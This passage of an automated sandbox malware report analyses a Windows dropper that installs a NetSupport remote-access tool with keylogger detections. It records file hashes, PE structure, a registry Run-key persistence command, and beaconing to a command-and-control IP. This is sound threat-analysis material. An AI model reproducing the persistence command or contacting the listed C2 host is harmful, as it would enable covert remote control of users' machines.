                                                                                    SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\pcicapi.dll, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Public\Videos\Video\remcmdstub.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):77224
                                                                                    Entropy (8bit):6.793971095882093
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                    MD5:325B65F171513086438952A152A747C4
                                                                                    SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                    SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                    SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loca[1].htm

                                                                                    Download File
                                                                                    Process:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):15
                                                                                    Entropy (8bit):2.7329145639793984
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:QJgTG:QkG
                                                                                    MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                    SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                    SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                    SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                    Malicious:false
                                                                                    Preview:32.7767,-96.797

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.940330546772841
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:file.exe
                                                                                    File size:2'138'286 bytes
                                                                                    MD5:166d71e145b2c802acd2b0a07e070bad
                                                                                    SHA1:1c84d2e573e7096040fbe6e950fbff764aa11096
                                                                                    SHA256:33b22fce68d5d7bd08e86b8506c50bdfcd38c26db5983864e8d33bdf62f53272
                                                                                    SHA512:5137efaeda15554cf5b8ff68516d91b9cb3e960b85970f535e8735b1705f62cb390ffef4c7b964ed33764cd3b772aaca0ac1468ec67abe7fd2de9ddf2465f6e4
                                                                                    SSDEEP:49152:VIf3w6NbHHBp7k5hhJ+j0h7x0vRNT1UTzPN0EkHbG+n9:VIfwYt5ShrfKvo1U
                                                                                    TLSH:61A52302B9D3C5B2D53308350B196F55747DBE303F18CDAAE7C95E1EDA31292A628B63
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......

                                                                                    File Icon

                                                                                    Icon Hash:1515d4d4442f2d2d

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x41d779
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:1
                                                                                    File Version Major:5
                                                                                    File Version Minor:1
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:1
                                                                                    Import Hash:00be6e6c4f9e287672c8301b72bdabf3

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    call 00007FE4789A52DFh
                                                                                    jmp 00007FE4789A4CD3h
                                                                                    cmp ecx, dword ptr [0043A1C8h]
                                                                                    jne 00007FE4789A4E45h
                                                                                    ret
                                                                                    jmp 00007FE4789A5456h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 00430FE8h
                                                                                    mov dword ptr [ecx], 00431994h
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FE4789983DDh
                                                                                    mov dword ptr [esi], 004319A0h
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 004319A8h
                                                                                    mov dword ptr [ecx], 004319A0h
                                                                                    ret
                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                    mov dword ptr [ecx], 00431988h
                                                                                    push eax
                                                                                    call 00007FE4789A7FEEh
                                                                                    pop ecx
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 00431988h
                                                                                    push eax
                                                                                    call 00007FE4789A7FD7h
                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                    pop ecx
                                                                                    je 00007FE4789A4E4Ch
                                                                                    push 0000000Ch
                                                                                    push esi
                                                                                    call 00007FE4789A4412h
                                                                                    pop ecx
                                                                                    pop ecx
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 0Ch
                                                                                    lea ecx, dword ptr [ebp-0Ch]
                                                                                    call 00007FE4789A4DAEh
                                                                                    push 00437B58h
                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                    push eax
                                                                                    call 00007FE4789A76D6h
                                                                                    int3
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 0Ch

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                    • [C++] VS2015 UPD3.1 build 24215
                                                                                    • [EXP] VS2015 UPD3.1 build 24215
                                                                                    • [RES] VS2015 UPD3 build 24213
                                                                                    • [LNK] VS2015 UPD3.1 build 24215

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x38cd00x34.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x38d040x3c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000xe034.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x1fd0.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x36ee00x54.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x319280x40.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x300000x25c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x382540x120.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x2e8640x2ea008c2dd3ebce78edeed565107466ae1d3eFalse0.5908595844504021data6.693477406609911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x300000x9aac0x9c00b8d3a709e8e2861298e51f270be0f883False0.45718149038461536data5.133828516884417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x3a0000x213d00xc007a066b052b7178cd1388c71d17dec570False0.2789713541666667data3.2428863859698565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .gfids0x5c0000xe80x2000a8129f1f5d2e8ddcb61343ecd6f891aFalse0.33984375data2.0959167744603624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x5d0000xe0340xe200d62594e063ef25acc085c21831d77a75False0.6341779590707964data6.802287495720703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x6c0000x1fd00x2000983e78af74da826d9233ebaa3055869aFalse0.8060302734375data6.687357530503152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    PNG0x5d6440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                    PNG0x5e18c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                    RT_ICON0x5f7380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                    RT_ICON0x5fca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                    RT_ICON0x605480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                    RT_ICON0x613f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                    RT_ICON0x618580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                    RT_ICON0x629000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                    RT_ICON0x64ea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                    RT_DIALOG0x68c1c0x2a2data0.5296735905044511
                                                                                    RT_DIALOG0x68ec00x13adata0.6624203821656051
                                                                                    RT_DIALOG0x68ffc0xf2data0.71900826446281
                                                                                    RT_DIALOG0x690f00x14edata0.5868263473053892
                                                                                    RT_DIALOG0x692400x318data0.476010101010101
                                                                                    RT_DIALOG0x695580x24adata0.6262798634812287
                                                                                    RT_STRING0x697a40x1fcdata0.421259842519685
                                                                                    RT_STRING0x699a00x246data0.41924398625429554
                                                                                    RT_STRING0x69be80x1dcdata0.5105042016806722
                                                                                    RT_STRING0x69dc40xdcdata0.65
                                                                                    RT_STRING0x69ea00x468data0.375
                                                                                    RT_STRING0x6a3080x164data0.5056179775280899
                                                                                    RT_STRING0x6a46c0xe4data0.6359649122807017
                                                                                    RT_STRING0x6a5500x158data0.4563953488372093
                                                                                    RT_STRING0x6a6a80xe8data0.5948275862068966
                                                                                    RT_STRING0x6a7900xe6data0.5695652173913044
                                                                                    RT_GROUP_ICON0x6a8780x68data0.7019230769230769
                                                                                    RT_MANIFEST0x6a8e00x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllGetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                    gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-11-16T12:53:12.437468+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.44973045.61.128.74443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 16, 2024 12:53:13.134946108 CET49730443192.168.2.445.61.128.74
                                                                                    Nov 16, 2024 12:53:13.135042906 CET4434973045.61.128.74192.168.2.4
                                                                                    Nov 16, 2024 12:53:13.135138035 CET49730443192.168.2.445.61.128.74
                                                                                    Nov 16, 2024 12:53:13.225316048 CET49730443192.168.2.445.61.128.74
                                                                                    Nov 16, 2024 12:53:13.225404024 CET4434973045.61.128.74192.168.2.4
                                                                                    Nov 16, 2024 12:53:13.225475073 CET4434973045.61.128.74192.168.2.4
                                                                                    Nov 16, 2024 12:53:13.300388098 CET4973180192.168.2.4104.26.0.231
                                                                                    Nov 16, 2024 12:53:13.305720091 CET8049731104.26.0.231192.168.2.4
                                                                                    Nov 16, 2024 12:53:13.305810928 CET4973180192.168.2.4104.26.0.231
                                                                                    Nov 16, 2024 12:53:13.306381941 CET4973180192.168.2.4104.26.0.231
                                                                                    Nov 16, 2024 12:53:13.311589956 CET8049731104.26.0.231192.168.2.4
                                                                                    Nov 16, 2024 12:53:14.178884983 CET8049731104.26.0.231192.168.2.4
                                                                                    Nov 16, 2024 12:53:14.179079056 CET4973180192.168.2.4104.26.0.231
                                                                                    Nov 16, 2024 12:55:03.242310047 CET4973180192.168.2.4104.26.0.231
                                                                                    Nov 16, 2024 12:55:03.247806072 CET8049731104.26.0.231192.168.2.4
                                                                                    Nov 16, 2024 12:55:03.247929096 CET4973180192.168.2.4104.26.0.231

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 16, 2024 12:53:13.263967991 CET5089553192.168.2.41.1.1.1
                                                                                    Nov 16, 2024 12:53:13.295906067 CET53508951.1.1.1192.168.2.4
                                                                                    Nov 16, 2024 12:53:54.121422052 CET5350853162.159.36.2192.168.2.4
                                                                                    Nov 16, 2024 12:53:54.777693033 CET53540241.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Nov 16, 2024 12:53:13.263967991 CET192.168.2.41.1.1.10xb9b3Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Nov 16, 2024 12:53:13.295906067 CET1.1.1.1192.168.2.40xb9b3No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                    Nov 16, 2024 12:53:13.295906067 CET1.1.1.1192.168.2.40xb9b3No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                    Nov 16, 2024 12:53:13.295906067 CET1.1.1.1192.168.2.40xb9b3No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • 45.61.128.74connection: keep-alivecmd=pollinfo=1ack=1
                                                                                    • geo.netsupportsoftware.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.44973045.61.128.744437688C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 16, 2024 12:53:13.225316048 CET216OUTPOST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                    Data Raw:
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449731104.26.0.231807688C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 16, 2024 12:53:13.306381941 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                    Host: geo.netsupportsoftware.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    Nov 16, 2024 12:53:14.178884983 CET1112INHTTP/1.1 200 OK
                                                                                    Date: Sat, 16 Nov 2024 11:53:14 GMT
                                                                                    Content-Type: text/html; Charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Ray: 8e37478588274624-DFW
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cache-Control: private
                                                                                    Set-Cookie: ASPSESSIONIDSSBQDBCQ=MCAKHFBALOOIMPLFMACHLDII; path=/
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                    Vary: Accept-Encoding
                                                                                    cf-apo-via: origin,host
                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2PHJwBb7%2Fcm7yYvup65TM%2BxKF21l7ufYS19xIYlJsa0Hdf3Hyj85bSMeT8rp%2BCCpilhUTYOAV6lRKq386XNQDqccQnilW386WIGJqEGuh9YMZcuTSFe6WJ9GNT%2FnA2kEnmp%2F24M8VjR7nwkt"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: f32.7767,-96.7970


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:06:53:09
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:2'138'286 bytes
                                                                                    MD5 hash:166D71E145B2C802ACD2B0A07E070BAD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:06:53:10
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:06:53:10
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:06:53:10
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                    Imagebase:0xef0000
                                                                                    File size:59'392 bytes
                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:06:53:10
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    Imagebase:0x820000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.1735527672.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\bild.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 29%, ReversingLabs
                                                                                    • Detection: 49%, Virustotal, Browse
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:06:53:20
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                    Imagebase:0x820000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1834399853.0000000000858000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000000.1832877239.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1834377646.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
